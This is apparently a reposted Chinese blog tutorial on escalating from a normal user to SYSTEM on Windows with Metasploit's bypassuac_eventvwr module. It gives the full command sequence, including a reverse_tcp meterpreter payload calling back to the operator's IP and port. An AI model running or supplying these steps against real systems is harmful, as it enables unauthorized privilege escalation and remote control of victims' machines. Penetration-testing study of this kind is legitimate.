msf_bypassuac提权

匿名 (未验证) 提交于 2019-12-03 00:18:01

反弹msf之前也发了好几篇了,这里小伙子就直接利用已经反弹回来的meterpreter进行uac提权了


一.现在利用meterpreter的getuid进行查看权限,getuid.


这就是一个普通的用户

二.直接利用msf的getsystem尝试提权,getsystem


显示提权失败

三.把这个sessions后台运行,background


四.使用bypassuac模块,use exploit/windows/local/bypassuac_eventvwr


五.对参数进行设置

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.43.79(本机ip)

set LPORT 8888(本机接受的端口)

set target 1 (设置1为x64的,0为x86的,可以show targets进行查看)

set SESSION 1(指向我们刚刚后台运行的那个session)




运行生成一个新的session,exploit


进入新的session后,getsystem


getuid查看下权限


提权成功


感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!

文章来源: msf_bypassuac提权
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!